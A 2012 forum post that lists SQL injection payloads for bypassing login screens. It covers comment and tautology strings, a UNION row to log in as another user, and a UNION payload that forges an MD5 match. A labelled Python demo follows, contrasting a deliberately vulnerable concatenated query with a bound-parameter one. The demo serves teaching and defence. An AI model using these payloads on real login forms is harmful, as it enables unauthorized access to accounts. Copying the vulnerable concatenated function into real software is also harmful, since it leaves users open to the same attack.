EXPERTS AND PROFESSIONALS ONLY!


    How to Bypass Login Screens By SQL Injection


    Post  zeusk on Sun Nov 11, 2012 6:29 pm

    Bypassing Login Screens (SMO+)

    SQL Injection 101, Login tricks

    admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--
    ....

    Login as different user (SM*)

    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

    *Old versions of MySQL don't support union queries

    Bypassing second MD5 hash check login screens

    If the application first gets the record by username and then compares the returned MD5 with the supplied password's MD5, then you need some extra tricks to fool the application to bypass authentication. You can union results with a known password and the MD5 hash of the supplied password. In this case the application will compare your password and your supplied MD5 hash instead of the MD5 from the database.

    Bypassing MD5 Hash Check Example (MSP)

    Username : admin
    Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

    81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
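
Added example, not part of the original post: the fetch-by-username-then-compare-MD5 login the post describes, built by string concatenation, next to the same login with a bound parameter, run against two strings quoted from the post. The in-memory SQLite table, its column names, the stored password and the function names are assumptions made for the demonstration.

```python
import hashlib
import hmac
import sqlite3

# The two strings below are quoted from the post; everything else is constructed.
TAUTOLOGY = "' or 1=1--"
UNION_ROW = "' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"


def md5_hex(text):
    # MD5 is used only because it is the scheme the post describes.
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    # Constructed sample data: one account with a made-up password.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_md5 TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", md5_hex("constructed-secret")))
    return db


def login_concat(db, username, password):
    # Weak form: the username becomes part of the SQL text, so it can
    # change which row (and which hash) the comparison below sees.
    sql = "SELECT username, pw_md5 FROM users WHERE username = '" + username + "'"
    row = db.execute(sql).fetchone()
    return row is not None and row[1] == md5_hex(password)


def login_bound(db, username, password):
    # Hardened form: the username is bound as data and is never parsed as SQL.
    row = db.execute("SELECT username, pw_md5 FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[1], md5_hex(password))


def compare():
    # Returns (concat_result, bound_result) for each input pair.
    db = make_db()
    cases = [("admin", "constructed-secret"),  # legitimate login
             (TAUTOLOGY, "1234"),              # selects a row, hash check still fails
             (UNION_ROW, "1234")]              # supplies its own row and hash
    return [(login_concat(db, u, p), login_bound(db, u, p)) for u, p in cases]


if __name__ == "__main__":
    for outcome in compare():
        print(outcome)
```

The second case shows why the post says the hash-check design needs "extra tricks", and the third shows that the hash check alone is no protection once the lookup query is built from input; only the bound-parameter version rejects both.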
